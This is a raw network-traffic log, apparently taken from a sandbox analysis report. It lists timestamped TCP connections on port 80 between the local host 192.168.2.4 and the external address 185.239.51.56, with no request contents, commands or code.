                                                                                                  Jan 1, 2025 02:27:54.758239985 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.758249998 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.758256912 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.001338959 CET8049799185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.050055981 CET4979980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.114847898 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.159471035 CET4980080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.173346043 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.173455000 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.173532009 CET4980080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.173618078 CET4980080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.174442053 CET8049799185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.174526930 CET8049799185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.174577951 CET4979980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.174624920 CET4979980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.178364038 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.179390907 CET8049799185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.295784950 CET4980680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.300649881 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.302015066 CET4980680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.302218914 CET4980680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.302258015 CET4980680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.307051897 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.307060957 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.307198048 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.307205915 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.034147978 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.045001984 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.045041084 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.045105934 CET4980680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:56.085231066 CET4980680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:56.090030909 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.306143045 CET4981280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:56.310973883 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.311069012 CET4981280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:56.314662933 CET4981280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:56.319475889 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.659555912 CET4981280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:56.664448023 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.664460897 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.664470911 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.033912897 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.041899920 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.041949987 CET4981280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.042043924 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.042052984 CET4981280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.042087078 CET4981280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.046798944 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.155817032 CET4981880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.160597086 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.160654068 CET4981880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.160756111 CET4981880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.165477037 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.518896103 CET4981880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.523775101 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.523808002 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.523823023 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.863013029 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.870934010 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.871021032 CET4981880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.871049881 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.871649981 CET4981880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.871697903 CET4981880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.876413107 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.983274937 CET4982680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.988082886 CET8049826185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.988245010 CET4982680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.988245964 CET4982680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.993014097 CET8049826185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:58.347083092 CET4982680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:58.351948023 CET8049826185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:58.351960897 CET8049826185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:58.351969004 CET8049826185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:58.690412998 CET8049826185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:58.697778940 CET8049826185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:58.697819948 CET8049826185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:58.697830915 CET4982680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:58.697865963 CET4982680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:58.697937965 CET4982680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:58.702663898 CET8049826185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:58.813888073 CET4983380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:58.818697929 CET8049833185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:58.818758011 CET4983380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:58.818903923 CET4983380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:58.823656082 CET8049833185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:59.175158978 CET4983380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:59.180042028 CET8049833185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:59.180058956 CET8049833185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:59.180068016 CET8049833185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:59.520526886 CET8049833185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:59.529906034 CET8049833185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:59.529978037 CET8049833185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:59.530010939 CET4983380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:59.530294895 CET4983380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:59.530294895 CET4983380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:59.535065889 CET8049833185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:59.653547049 CET4984080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:59.658816099 CET8049840185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:59.659266949 CET4984080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:59.659266949 CET4984080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:59.664037943 CET8049840185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.003308058 CET4984080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:00.008224964 CET8049840185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.008236885 CET8049840185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.008244038 CET8049840185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.175846100 CET4984080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:00.175848007 CET4984380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:00.180650949 CET8049843185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.180803061 CET4984380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:00.180809021 CET8049840185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.180835962 CET4984380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:00.180949926 CET4984080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:00.185614109 CET8049843185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.294426918 CET4984480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:00.417913914 CET8049844185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.417978048 CET4984480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:00.418203115 CET4984480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:00.422979116 CET8049844185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.534584045 CET4984380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:00.539472103 CET8049843185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.539580107 CET8049843185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.768995047 CET4984480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:00.773866892 CET8049844185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.773878098 CET8049844185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.773886919 CET8049844185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.887928963 CET8049843185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.896472931 CET8049843185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.896562099 CET8049843185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:00.896621943 CET4984380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:00.896704912 CET4984380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:00.901494026 CET8049843185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:01.122096062 CET8049844185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:01.175072908 CET4984480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:01.287503958 CET8049844185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:01.287678957 CET4984480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:01.287961960 CET8049844185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:01.288007021 CET4984480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:01.292434931 CET8049844185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:01.410890102 CET4985380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:01.415818930 CET8049853185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:01.415906906 CET4985380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:01.415987968 CET4985380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:01.420753002 CET8049853185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:01.769074917 CET4985380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:01.858221054 CET8049853185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:01.858231068 CET8049853185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:01.858237982 CET8049853185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:02.150590897 CET8049853185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:02.206332922 CET4985380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:02.292403936 CET8049853185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:02.292553902 CET4985380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:02.292705059 CET8049853185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:02.292774916 CET4985380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:02.297369957 CET8049853185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:02.410103083 CET4986080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:02.414969921 CET8049860185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:02.415039062 CET4986080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:02.415165901 CET4986080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:02.419955015 CET8049860185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:02.769310951 CET4986080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:02.774175882 CET8049860185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:02.774188042 CET8049860185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:02.774193048 CET8049860185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:03.136748075 CET8049860185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:03.149343014 CET8049860185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:03.149492979 CET8049860185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:03.149580002 CET4986080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:03.154541016 CET4986080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:03.159286022 CET8049860185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:03.345496893 CET4986780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:03.350354910 CET8049867185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:03.351198912 CET4986780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:03.351349115 CET4986780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:03.356112003 CET8049867185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:03.706432104 CET4986780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:03.711332083 CET8049867185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:03.711344004 CET8049867185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:03.711361885 CET8049867185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:04.098622084 CET8049867185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:04.143846989 CET4986780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:04.255013943 CET8049867185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:04.255193949 CET4986780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:04.255639076 CET8049867185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:04.255764961 CET4986780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:04.260051012 CET8049867185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:04.376691103 CET4987680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:04.381498098 CET8049876185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:04.381565094 CET4987680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:04.381692886 CET4987680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:04.386480093 CET8049876185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:04.737799883 CET4987680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:04.742649078 CET8049876185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:04.742660046 CET8049876185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:04.742685080 CET8049876185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:05.093189001 CET8049876185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:05.104100943 CET8049876185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:05.104151964 CET4987680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:05.104198933 CET8049876185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:05.104243040 CET4987680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:05.104372978 CET4987680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:05.109081984 CET8049876185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:05.219248056 CET4988280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:05.224086046 CET8049882185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:05.224165916 CET4988280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:05.224291086 CET4988280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:05.229034901 CET8049882185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:05.581475019 CET4988280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:05.586352110 CET8049882185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:05.586371899 CET8049882185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:05.586380959 CET8049882185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:05.910203934 CET4988880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:05.910430908 CET4988280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:05.915133953 CET8049888185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:05.915224075 CET4988880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:05.915301085 CET4988880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:05.915541887 CET8049882185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:05.915592909 CET4988280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:05.920061111 CET8049888185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.029855013 CET4988980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:06.034852982 CET8049889185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.035043001 CET4988980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:06.035043001 CET4988980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:06.039839029 CET8049889185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.269009113 CET4988880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:06.275724888 CET8049888185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.275738001 CET8049888185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.393908024 CET4988980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:06.398776054 CET8049889185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.398786068 CET8049889185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.398796082 CET8049889185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.617422104 CET8049888185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.626594067 CET8049888185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.626636028 CET8049888185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.626642942 CET4988880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:06.626684904 CET4988880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:06.626775980 CET4988880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:06.631566048 CET8049888185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.747714996 CET8049889185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.759414911 CET8049889185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.759466887 CET4988980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:06.759560108 CET8049889185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.759563923 CET4988980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:06.759957075 CET4988980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:06.764390945 CET8049889185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.875612974 CET4989580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:06.880453110 CET8049895185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:06.886080027 CET4989580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:06.886421919 CET4989580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:06.891201973 CET8049895185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:07.237708092 CET4989580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:07.242516041 CET8049895185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:07.242537022 CET8049895185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:07.242546082 CET8049895185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:07.596858025 CET8049895185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:07.643882990 CET4989580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:07.737559080 CET8049895185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:07.737817049 CET4989580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:07.738337994 CET8049895185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:07.738398075 CET4989580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:07.742603064 CET8049895185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:07.858194113 CET4990380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:07.863014936 CET8049903185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:07.863791943 CET4990380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:07.863894939 CET4990380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:07.868696928 CET8049903185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:08.222075939 CET4990380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:08.226953983 CET8049903185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:08.226965904 CET8049903185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:08.226982117 CET8049903185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:08.574812889 CET8049903185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:08.586486101 CET8049903185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:08.586498022 CET8049903185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:08.586539984 CET4990380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:08.586685896 CET4990380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:08.591418982 CET8049903185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:08.704580069 CET4990980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:08.709428072 CET8049909185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:08.709491014 CET4990980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:08.709635973 CET4990980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:08.714437008 CET8049909185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.065808058 CET4990980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:09.070796013 CET8049909185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.070810080 CET8049909185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.070817947 CET8049909185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.439157963 CET8049909185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.446872950 CET8049909185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.446927071 CET4990980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:09.446968079 CET8049909185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.447017908 CET4990980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:09.447046995 CET4990980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:09.451853037 CET8049909185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.561208010 CET4991780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:09.566040039 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.566401005 CET4991780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:09.566495895 CET4991780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:09.571309090 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.925236940 CET4991780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:09.930187941 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.930200100 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.930210114 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.290724039 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.334517956 CET4991780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:10.431458950 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.431643009 CET4991780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:10.431786060 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.431826115 CET4991780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:10.436423063 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.545980930 CET4992480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:10.550844908 CET8049924185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.550901890 CET4992480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:10.551018000 CET4992480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:10.555819035 CET8049924185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.909564972 CET4992480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:10.914412022 CET8049924185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.914434910 CET8049924185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.914446115 CET8049924185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:11.260884047 CET8049924185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:11.315753937 CET4992480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:11.399409056 CET8049924185.239.51.56192.168.2.4
